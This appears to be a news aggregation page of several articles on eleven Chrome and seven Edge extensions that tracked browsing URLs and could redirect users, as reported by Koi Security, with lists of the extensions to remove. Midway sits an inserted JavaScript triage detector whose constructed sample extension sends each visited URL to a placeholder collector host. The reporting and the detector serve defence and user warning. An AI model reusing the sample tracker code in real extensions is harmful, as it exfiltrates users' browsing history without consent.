Latest news with #KoiSecurity


Scottish Sun
4 days ago
All Chrome users must delete 11 apps downloaded over two million times NOW as experts issue 'tracker' warning
Add-ons can steal browser activity and redirect users to potentially unsafe web addresses

THOUSANDS of Chrome users are being urged to delete immediately certain apps that pose a security risk. It comes after experts issued a "tracker" warning on 11 apps that have been downloaded more than two million times.

The apps can track users, steal browser activity, and redirect to potentially unsafe web addresses.

3.45b users choose Chrome to surf the web

Chrome is the most popular internet browser with an estimated 3.45 billion users, according to the latest statistics.

Most of the add-ons provide the advertised functionality and pose as legitimate tools like colour pickers, VPNs, volume boosters, and emoji keyboards. Researchers at Koi Security, a company providing a platform for securing self-provisioned software, discovered the malicious extensions in the Chrome Web Store and reported them to Google.

Researchers noted that many of those extensions are verified. They also have hundreds of positive reviews and were featured prominently on the Chrome Web Store. This, the researchers note, could have misled users about their safety.

Add-ons to check and remove

Users should check for the following add-ons in the Chrome browser and remove them as soon as possible:

- Color Picker, Eyedropper — Geco colorpick
- Emoji keyboard online — copy&paste your emoji
- Free Weather Forecast
- Video Speed Controller — Video manager
- Unlock Discord — VPN Proxy to Unblock Discord Anywhere
- Dark Theme — Dark Reader for Chrome
- Volume Max — Ultimate Sound Booster
- Unblock TikTok — Seamless Access with One-Click Proxy
- Unlock YouTube VPN
- Unlock TikTok
- Weather

One of them, Volume Max — Ultimate Sound Booster, was also flagged by LayerX researchers last month, who warned about its potential for spying on users. However, no malicious activity could be confirmed at the time.

According to the researchers, the malicious functionality is implemented in the background service worker of each extension using the Chrome Extensions API, registering a listener that is triggered every time a user navigates to a new webpage. The listener captures the URL of the visited page and exfiltrates the information to a remote server along with a unique tracking ID for each user.

The server can respond with redirection URLs, hijacking the user's browsing activity and potentially taking them to unsafe destinations that may enable cyberattacks. Although the possibility is there, it should be noted that Koi Security has not observed malicious redirections in their testing.

Cybercriminals at large

It comes after researchers at Koi Security discovered cybercriminals have also planted malicious extensions in the official store for Microsoft Edge, which shows a total count of 600,000 downloads.

"Combined, these eighteen extensions have infected over 2.3 million users across both browsers, creating one of the largest browser hijacking operations we've documented," the researchers said.

They recommend users remove all listed extensions immediately, clear the browsing data to purge any tracking identifiers, check the system for malware, and monitor accounts for suspicious activity.

Google has confirmed that all the extensions Koi Security discovered have now been removed from the Chrome Web Store, according to Bleeping Computer.


The Irish Sun
4 days ago
All Chrome users must delete 11 apps downloaded over two million times NOW as experts issue 'tracker' warning


The Sun
4 days ago
All Chrome users must delete 11 apps downloaded over two million times NOW as experts issue 'tracker' warning


Express Tribune
5 days ago
Malicious Google Chrome extensions might be killing your system: Find out which ones
Eleven malicious extensions, with a total of 1.7 million downloads, have been found on Google's Chrome Web Store, posing significant risks to users by tracking their browsing activity and potentially redirecting them to harmful websites. The discovery was made by researchers at Koi Security, a platform for securing self-provisioned software, who alerted Google to the issue, and was reported first by Bleeping Computer.

The malicious extensions, which masquerade as useful tools such as color pickers, VPNs, volume boosters, and emoji keyboards, have received positive reviews and have been prominently featured on the store, making them appear legitimate to unsuspecting users. However, many of these extensions, despite being initially safe, later received updates that introduced malicious code.

Some of the extensions have been removed from the Web Store, but many remain accessible. Users are advised to check for and uninstall the following extensions immediately:

- Color Picker, Eyedropper — Geco colorpick
- Emoji Keyboard Online — Copy&paste your emoji
- Free Weather Forecast
- Video Speed Controller — Video manager
- Unlock Discord — VPN Proxy to Unblock Discord Anywhere
- Dark Theme — Dark Reader for Chrome
- Volume Max — Ultimate Sound Booster
- Unblock TikTok — Seamless Access with One-Click Proxy
- Unlock YouTube VPN
- Unlock TikTok
- Weather

One of the extensions, 'Volume Max — Ultimate Sound Booster', had previously been flagged by LayerX researchers for potential spying, although no malicious activity was confirmed at the time.

The core issue lies in the background service worker of each extension, which uses the Chrome Extensions API to track users. A listener is triggered when users visit new webpages, capturing the URL and sending it to a remote server with a unique tracking ID. This server can then redirect users to unsafe sites, potentially leading to cyberattacks. However, Koi Security's testing has not yet observed any active redirections.

The malicious code was not present in the initial versions of these extensions but was added later through updates. Google's auto-update system silently deployed these updated versions to users without their consent or interaction. This suggests that the extensions may have been compromised by external actors over time.

"⚠️ Over 1.7 MILLION users impacted! Malicious Chrome extensions were found lurking on the Web Store. Is your browser safe? Check your extensions now! #ChromeSecurity #Cybersecurity" — X CyberSec (@xcybersecnews), July 9, 2025

Further investigation revealed that similar malicious extensions had been found in the official store for Microsoft Edge, which have garnered 600,000 downloads. In total, the malicious extensions across both browsers have affected over 2.3 million users, marking one of the largest browser hijacking operations in recent memory.

Koi Security recommends that users remove the listed extensions immediately, clear their browsing data to remove tracking identifiers, scan their systems for malware, and monitor their accounts for any suspicious activity.
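The behaviour reported above (a background service worker that listens for page navigations and sends each URL to a remote server) can be screened for statically when reviewing an unpacked extension. The JavaScript below is an added example, not code from Koi Security or from any outlet quoted here; the function name, the regex heuristics and both sample extensions are constructed, and chrome.tabs.onUpdated / chrome.webNavigation are assumed as the navigation hooks because the articles do not name the API call.

```javascript
// Added example: static triage of an unpacked extension (manifest.json + worker source).
// Heuristic only: a hit means "review this extension", not "this is malware".
const BROAD_HOSTS = new Set(["<all_urls>", "*://*/*", "http://*/*", "https://*/*"]);
const PATTERNS = {
  navigationListener: /chrome\.(tabs\.onUpdated|webNavigation\.on\w+)\.addListener/,
  outboundRequest: /\bfetch\s*\(|XMLHttpRequest|navigator\.sendBeacon/,
  tabRedirect: /chrome\.tabs\.update\s*\(/,
};

function triageExtension(manifest, workerSource) {
  const perms = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];
  const flags = [];
  if (manifest.background && manifest.background.service_worker) flags.push("hasServiceWorker");
  // Every tab's URL is readable with "tabs" or a broad host pattern.
  const canReadUrls = perms.includes("tabs") || perms.some((p) => BROAD_HOSTS.has(p));
  if (canReadUrls) flags.push("canReadTabUrls");
  for (const [name, re] of Object.entries(PATTERNS)) {
    if (re.test(workerSource)) flags.push(name);
  }
  // The reported combination: sees URLs, hooks navigation, talks to a server.
  const needsReview = canReadUrls &&
    flags.includes("navigationListener") && flags.includes("outboundRequest");
  return { name: manifest.name, flags, needsReview };
}

// Constructed sample: matches the pattern the articles describe.
const constructedTracker = {
  manifest: { name: "Sample Volume Tool (constructed)", manifest_version: 3,
    permissions: ["tabs", "storage"], host_permissions: ["<all_urls>"],
    background: { service_worker: "background.js" } },
  worker: 'chrome.tabs.onUpdated.addListener((id, info, tab) => {\n' +
    '  fetch("https://collector.example.invalid/v", { method: "POST", body: tab.url });\n' +
    '});',
};
// Constructed sample: a tool that only acts when the user clicks its icon.
const constructedBenign = {
  manifest: { name: "Sample Color Tool (constructed)", manifest_version: 3,
    permissions: ["activeTab"], background: { service_worker: "background.js" } },
  worker: 'chrome.action.onClicked.addListener((tab) => { /* open picker UI */ });',
};

for (const s of [constructedTracker, constructedBenign]) {
  console.log(JSON.stringify(triageExtension(s.manifest, s.worker)));
}
```

Because the articles report that the malicious code arrived in later updates, a check like this is only useful if it is re-run whenever an installed extension's version changes.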


Forbes
5 days ago
Delete Every Chrome And Edge Extension That's On This List
Google Chrome and Microsoft Edge are under attack. The latest zero-day vulnerability was discovered by Google's own Threat Analysis Group and triggered a quiet configuration change for 'all users' and an emergency update. CVE-2025-6554 also prompted America's cyber defense agency to warn that this 'type confusion vulnerability could allow a remote attacker to perform arbitrary read/write via a crafted HTML page,' mandating government staff update by July 23.

But there's another threat to Chrome and Edge that's hidden from view. In recent weeks, both LayerX and Symantec have warned of the very real dangers in the extensions installed by hundreds of millions of users from official stores. Now we have more of the same.

Koi Security has just warned users to delete a list of 18 extensions if they're installed on their devices, extensions that present a real and present threat to those users and which have been installed millions of times.

'If you think a Chrome extension with Google's verified badge, 100,000+ installs, 800+ reviews, and featured placement on the store is trustworthy? Think again,' the team says. Once again, these dangerous add-ons 'perfectly demonstrate how sophisticated threat actors are exploiting the trust signals we rely on.'

The extensions, Koi says, 'masquerade as popular productivity and entertainment tools across diverse categories: emoji keyboards, weather forecasts, video speed controllers, VPN proxies for Discord and TikTok, dark themes, volume boosters, and YouTube unblockers.' The type of trivial functionality that is catnip to users.

The team says each extension 'provides legitimate functionality while secretly implementing the same browser surveillance and hijacking capabilities we discovered in the color picker.' It's the common ecosystem and code base that has enabled other security teams to unpick networks of dangerous extensions in the past.

And again, some of these extensions 'have achieved verified status or featured placement across both the Chrome Web Store and Microsoft Edge Add-ons store, demonstrating that security failures extend across both major browser marketplaces.'

The software is controlled through external command and control servers, each with a unique subdomain. But while this gives 'the appearance of separate operators,' they are 'actually part of the same centralized attack infrastructure.'

Koi's team says 'immediate action is required' by affected users:

The list of identified extensions is as follows: Google Chrome: Microsoft Edge:

Some of these extensions have been removed from stores, but at the time of publishing, Koi reports many are still available. Check your own extensions against the list.